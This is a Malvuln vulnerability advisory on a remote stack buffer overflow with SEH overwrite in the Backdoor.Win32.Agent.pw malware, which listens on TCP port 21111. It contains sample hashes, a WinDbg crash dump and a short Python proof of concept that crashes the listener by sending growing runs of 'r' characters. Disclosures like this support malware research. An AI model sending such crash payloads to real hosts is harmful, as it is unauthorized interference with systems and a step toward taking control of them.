Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/68dd7df213674e096d6ee255a7b90088.txt
Contact: malvuln13@gmail.com
Media: x.com/malvuln
Threat: Backdoor.Win32.Agent.pw
Vulnerability: Remote Stack Buffer Overflow (SEH)
Description: The malware listens on TCP port 21111. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz triggering a stack buffer overflow overwriting the ECX, EDI registers and Structured Exception Handler (SEH). Sending a packet containing the ascii character "A" or "41", registers are overwritten with "3431" as 4 is 34 hex and 1 is 31 hex. The lowercase character "R" consistently triggers an access violation with registers being overwritten with "r" 72 hex.
Family: Agent
Type: PE32
MD5: 68dd7df213674e096d6ee255a7b90088
SHA256: 2ba1d27325224407b6d57e0e8d141e3f301225d18a68bb5380c46287a0fc4441
Vuln ID: MVID-2024-0697
Dropped files:
ASLR: False
DEP: False
CFG: False
Safe SEH: False
Disclosure: 09/27/2024
Memory Dump:
(1f90.1888): Stack buffer overflow - code c0000409 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=72727272 edx=040b1a3c esi=00000000 edi=00000002
eip=76fced3c esp=0019de98 ebp=0019ded8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
76fced3c c21400 ret 14h
0:000> .ecxr
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:
00411515 897904 mov dword ptr [ecx+4],edi ds:002b:72727276=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515
00411515 897904 mov dword ptr [ecx+4],edi
EXCEPTION_RECORD: 0019e09c -- (.exr 0x19e09c)
ExceptionAddress: 00411515 (Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x00011515)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000008
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 72727276
Attempt to write to address 72727276
PROCESS_NAME: Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_PARAMETER1: 00000015
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
CONTEXT: 0019e0ec -- (.cxr 0x19e0ec)
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:
00411515 897904 mov dword ptr [ecx+4],edi ds:002b:72727276=????????
Resetting default scope
WRITE_ADDRESS: 72727276
FOLLOWUP_IP:
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515
00411515 897904 mov dword ptr [ecx+4],edi
FAULTING_THREAD: 00001888
BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272
PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272
DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272
LAST_CONTROL_TRANSFER: from 0040c987 to 00411515
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019e56c 0040c987 025805a8 0000003f 0019e5bc Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515
0019e768 72727272 72727272 72727272 72727272 Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0xc987
0019e76c 72727272 72727272 72727272 72727272 0x72727272
0019e770 72727272 72727272 72727272 72727272 0x72727272
0019e774 72727272 72727272 72727272 72727272 0x72727272
0019e778 72727272 72727272 72727272 72727272 0x72727272
0019e77c 72727272 72727272 72727272 72727272 0x72727272
0019e780 72727272 72727272 72727272 72727272 0x72727272
0019e784 72727272 72727272 72727272 72727272 0x72727272
0019e788 72727272 72727272 72727272 72727272 0x72727272
0019e78c 72727272 72727272 72727272 72727272 0x72727272
0019e790 72727272 72727272 72727272 72727272 0x72727272
0019e794 72727272 72727272 72727272 72727272 0x72727272
0019e798 72727272 72727272 72727272 72727272 0x72727272
0019e79c 72727272 72727272 72727272 72727272 0x72727272
0019e7a0 72727272 72727272 72727272 72727272 0x72727272
0019e7a4 72727272 72727272 72727272 72727272 0x72727272
0019e7a8 72727272 72727272 72727272 72727272 0x72727272
0019e7ac 72727272 72727272 72727272 72727272 0x72727272
0019e7b0 72727272 72727272 72727272 72727272 0x72727272
0019e7b4 72727272 72727272 72727272 72727272 0x72727272
0019e7b8 72727272 72727272 72727272 72727272 0x72727272
0019e7bc 72727272 72727272 72727272 72727272 0x72727272
0019e7c0 72727272 72727272 72727272 72727272 0x72727272
0019e7c4 72727272 72727272 72727272 72727272 0x72727272
0019e7c8 72727272 72727272 72727272 72727272 0x72727272
0019e7cc 72727272 72727272 72727272 72727272 0x72727272
0019e7d0 72727272 72727272 72727272 72727272 0x72727272
0019e7d4 72727272 72727272 72727272 72727272 0x72727272
0019e7d8 72727272 72727272 72727272 72727272 0x72727272
0019e7dc 72727272 72727272 72727272 72727272 0x72727272
0019e7e0 72727272 72727272 72727272 72727272 0x72727272
0019e7e4 72727272 72727272 72727272 72727272 0x72727272
0019e7e8 72727272 72727272 72727272 72727272 0x72727272
0019e7ec 72727272 72727272 72727272 72727272 0x72727272
0019e7f0 72727272 72727272 72727272 72727272 0x72727272
0019e7f4 72727272 72727272 72727272 72727272 0x72727272
0019e7f8 72727272 72727272 72727272 72727272 0x72727272
0019e7fc 72727272 72727272 72727272 72727272 0x72727272
0019e800 72727272 72727272 72727272 72727272 0x72727272
0019e804 72727272 72727272 72727272 72727272 0x72727272
0019e808 72727272 72727272 72727272 72727272 0x72727272
0019e80c 72727272 72727272 72727272 72727272 0x72727272
0019e810 72727272 72727272 72727272 72727272 0x72727272
0019e814 72727272 72727272 72727272 72727272 0x72727272
0019e818 72727272 72727272 72727272 72727272 0x72727272
0019e81c 72727272 72727272 72727272 72727272 0x72727272
0019e820 72727272 72727272 72727272 72727272 0x72727272
0019e824 72727272 72727272 72727272 72727272 0x72727272
0019e828 72727272 72727272 72727272 72727272 0x72727272
0019e82c 72727272 72727272 72727272 72727272 0x72727272
0019e830 72727272 72727272 72727272 72727272 0x72727272
0019e834 72727272 72727272 72727272 72727272 0x72727272
0019e838 72727272 72727272 72727272 72727272 0x72727272
0019e83c 72727272 72727272 72727272 72727272 0x72727272
0019e840 72727272 72727272 72727272 72727272 0x72727272
0019e844 72727272 72727272 72727272 72727272 0x72727272
0019e848 72727272 72727272 72727272 72727272 0x72727272
0019e84c 72727272 72727272 72727272 72727272 0x72727272
0019e850 72727272 72727272 72727272 72727272 0x72727272
0019e854 72727272 72727272 72727272 72727272 0x72727272
0019e858 72727272 72727272 72727272 72727272 0x72727272
0019e85c 72727272 72727272 72727272 72727272 0x72727272
0019e860 72727272 72727272 72727272 72727272 0x72727272
0019e864 72727272 72727272 72727272 72727272 0x72727272
0019e868 72727272 72727272 72727272 72727272 0x72727272
0019e86c 72727272 72727272 72727272 72727272 0x72727272
0019e870 72727272 72727272 72727272 72727272 0x72727272
0019e874 72727272 72727272 72727272 72727272 0x72727272
0019e878 72727272 72727272 72727272 72727272 0x72727272
0019e87c 72727272 72727272 72727272 72727272 0x72727272
0019e97c 76fa665c 0019ea68 001a1758 000007a0 0x72727272
0019e9e0 76fa01a3 b8e17520 04394df0 04390000 ntdll!RtlpFindUnicodeStringInSection+0x19c
0019ea14 00000000 00000003 00000000 0000003b ntdll!RtlpFreeHeap+0x723
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088
IMAGE_NAME: Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 4228698c
STACK_COMMAND: .cxr 0x19e0ec ; kb
FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272_c0000409_Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272_MISSING_GSFRAME_Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515
Followup: MachineOwner
---------
0:000> !exchain
0019df50: ntdll!_except_handler4+0 (76fd6a50)
CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (770157ad)
0019e8f8: 72727272
Invalid exception stack at 72727272
Exploit/PoC:
from socket import *
import time
MALWARE_HOST="x.x.x.x"
PORT=21111
def doit():
print("[+] Backdoor.Win32.Agent.pw")
print("[+] Remote Stack Buffer Overflow - SEH")
print("[+] MD5: 68dd7df213674e096d6ee255a7b90088")
for i in range(1, 16):
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
PAYLOAD="r"*512 * i
s.send(PAYLOAD.encode())
time.sleep(0.3)
print(len(PAYLOAD))
s.close()
if __name__=="__main__":
doit()
print("Malvuln")
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).